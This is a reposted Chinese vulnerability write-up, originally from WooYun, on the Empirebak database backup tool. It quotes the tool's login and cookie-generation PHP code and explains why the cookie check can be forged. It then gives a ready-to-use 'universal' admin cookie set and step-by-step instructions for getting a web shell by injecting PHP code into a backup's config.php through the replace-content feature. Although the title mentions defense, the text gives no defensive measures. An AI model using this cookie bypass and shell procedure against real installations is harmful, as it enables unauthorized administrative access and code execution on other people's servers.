帝國備份王(Empirebak)萬能cookie及拿shell方法與防御
發(fā)布時間:2015-09-14 23:14:48 作者:佚名
我要評論

這篇文章主要介紹了帝國備份王(Empirebak)萬能cookie及拿shell方法與防御,需要的朋友可以參考下
轉(zhuǎn)自wooyun http://www.wooyun.org/bugs/wooyun-2014-078591
1.偽造cookie登錄系統(tǒng)(其實(shí)這一步多余的,大多用戶連密碼都沒改,都是默認(rèn)的123456)
登錄成功設(shè)置4個cookie,看代碼
1.偽造cookie登錄系統(tǒng)(其實(shí)這一步多余的,大多用戶連密碼都沒改,都是默認(rèn)的123456)
登錄成功設(shè)置4個cookie,看代碼
PHP Code復(fù)制內(nèi)容到剪貼板
- function login($lusername,$lpassword,$key,$lifetime=0){
- global $set_username,$set_password,$set_loginauth,$set_loginkey;
- if(emptyempty($lusername)||emptyempty($lpassword)) {
- printerror("EmptyLoginUser","index.php");
- }
- //驗(yàn)證碼
- if(!$set_loginkey)
- {
- if($key<>getcvar('checkkey')||emptyempty($key))
- {
- printerror("FailLoginKey","index.php");
- }
- }
- if(md5($lusername)<>md5($set_username)||md5($lpassword)<>$set_password)
- {
- printerror("ErrorUser","index.php");
- }
- //認(rèn)證碼
- if($set_loginauth&$set_loginauth!=$_POST['loginauth'])
- {
- printerror("ErrorLoginAuth","index.php");
- }
- $logintime=time();
- $rnd=make_password(12);//生成隨機(jī)字符
- $s1=esetcookie("bakusername",$lusername,0);
- $s2=esetcookie("bakrnd",$rnd,0);//隨機(jī)字符
- $s3=esetcookie("baklogintime",$logintime,0);
- Ebak_SCookieRnd($lusername,$rnd);//
- if(!$s1||!$s2)
- {
- printerror("NotOpenCookie","index.php");
- }
- printerror("LoginSuccess","admin.php");
- }
再看看make_password函數(shù)
PHP Code復(fù)制內(nèi)容到剪貼板
- function make_password($pw_length){
- $low_ascii_bound=50;
- $upper_ascii_bound=122;
- $notuse=array(58,59,60,61,62,63,64,73,79,91,92,93,94,95,96,108,111);
- while($i<$pw_length)
- {
- mt_srand((double)microtime()*1000000);
- $randnum=mt_rand($low_ascii_bound,$upper_ascii_bound);
- if(!in_array($randnum,$notuse))
- {
- $password1=$password1.chr($randnum);
- $i++;
- }
- }
- return $password1;
- }
這個函數(shù)只是生成隨機(jī)數(shù),再看看Ebak_SCookieRnd函數(shù)
PHP Code復(fù)制內(nèi)容到剪貼板
- function Ebak_SCookieRnd($username,$rnd){
- global $set_loginrnd;//$set_loginrnd為config.php里面的驗(yàn)證隨機(jī)碼
- $ckpass=md5(md5($rnd.$set_loginrnd).'-'.$rnd.'-'.$username.'-');//沒有把密碼加進(jìn)去,于是漏洞產(chǎn)生了
- esetcookie("loginebakckpass",$ckpass,0);
- }
下面給出萬能cookie(key:value):
XML/HTML Code復(fù)制內(nèi)容到剪貼板
- ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6
- ebak_bakrnd:35y5cCnnA4Kh
- ebak_bakusername:admin
- ebak_baklogintime:4070883661
使用以上cookie即可直接訪問admin.php
2.拿shell
后臺參數(shù)設(shè)置一般都設(shè)置好了,如果不能連接數(shù)據(jù)庫,可以在數(shù)據(jù)庫設(shè)置里填個自己的遠(yuǎn)程數(shù)據(jù)庫
備份數(shù)據(jù),隨便找個數(shù)據(jù)庫備份,
然后到替換目錄文件內(nèi)容里,選擇剛才備份的數(shù)據(jù)庫,
將”$b_table=”
替換成
“phpinfo();
$b_table=”
這里shell的路徑就是bdata/mysql_20141007221849/config.php
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來介紹一下thinkphp官方修復(fù)的一個getshell漏洞,框架對控制器沒有進(jìn)行足夠的檢測導(dǎo)致的一處getshell,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實(shí)例分析,需要的朋友可以參考下2017-05-19
ASP+PHP 標(biāo)準(zhǔn)sql注入語句(完整版)
這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識薄弱或基本功不足就容易導(dǎo)致sql注入安全問題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19- 對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,2017-04-29
XSS繞過技術(shù) XSS插入繞過一些方式總結(jié)
我們友情進(jìn)行XSS檢查,偶然跳出個小彈窗,其中我們總結(jié)了一些平時可能用到的XSS插入方式,方便我們以后進(jìn)行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類2016-12-27- 這篇文章主要介紹了Python 爬蟲使用動態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08
- 這篇文章主要介紹了使用爬蟲采集網(wǎng)站時,解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08